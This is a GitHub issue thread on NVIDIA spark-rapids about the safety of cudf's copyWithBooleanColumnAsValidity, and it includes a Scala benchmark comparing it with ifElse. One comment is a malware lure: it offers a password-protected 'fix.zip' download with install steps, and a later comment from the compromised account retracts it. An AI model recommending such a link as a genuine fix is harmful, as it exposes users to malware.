### ISSUE TITLE
[BUG] We should not be using copyWithBooleanColumnAsValidity unless we can prove it is 100% safe

### ISSUE THREAD

**Issue by revans2** [NVIDIA/spark-rapids#11397]
**Describe the bug**
`ColumnView.copyWithBooleanColumnAsValidity` is used in a few places in our plugin

https://github.com/search?q=repo%3ANVIDIA%2Fspark-rapids%20copyWithBooleanColumnAsValidity&type=code

But it does not appear to be safe, and there is even "undefined" behavior in the docs for some cases with the API.

https://github.com/rapidsai/cudf/blob/508bdea0dac581d5a33ceb609766c419ef51bbbb/java/src/main/java/ai/rapids/cudf/ColumnView.java#L916-L933

The problem is that LISTS and STRINGS in cudf can result in an incorrect cudf object if they are null but not empty (meaning the validity says the data is null, but the offsets say something is there. This API just makes a deep copy of the original input and then writes the validity mask over the top of it. This is not safe at all for anything that has STRINGS or LISTs in it.

We need to stop using this API and deprecate it unless we can prove that it is 100% safe to use, or make it 100% safe to use. \

Ideally we should just use a copyIfElse everywhere and if this type of API is measurably faster than copyIfElse, we should update it behind the scenes to do the optimization when it is safe to do so.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by revans2** [comment]
I just ran a benchmark and `ifElse` is actually faster than `copyWithBooleanColumnAsValidity` at least for simple longs.

```
import ai.rapids.cudf._

val numRows = (Int.MaxValue / 2).toInt
val halfRows = (numRows / 2).toInt
val zero = Scalar.fromLong(0)
val step = Scalar.fromLong(1)
val numbers = ColumnVector.sequence(zero, step, numRows)
val half = Scalar.fromInt(halfRows)
val validity = numbers.lessOrEqualTo(half)
val NULL = Scalar.fromNull(DType.INT64)

(0 until 50).foreach { _ =>
  spark.time{
    val tmp = validity.ifElse(numbers, NULL)
    Cuda.deviceSynchronize()
    tmp
  }.close()
}

(0 until 50).foreach { _ =>
  spark.time{
    val tmp = numbers.copyWithBooleanColumnAsValidity(validity)
    Cuda.deviceSynchronize()
    tmp
  }.close()
}

zero.close()
step.close()
numbers.close()
half.close()
validity.close()
NULL.close()
```

The `ifElse` typically ranged from 16 to 17 ms.  The `copyWithBooleanColumnAsValidity` was almost always 31 ms. We should just stop using the API and delete it.

**Comment by revans2** [comment]
I realized that creating the NULL scalar is something that would be specific to just the ifElse case so I moved it into the critical section there and closed it as a part of the processing. It didn't add any measurable time.

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**
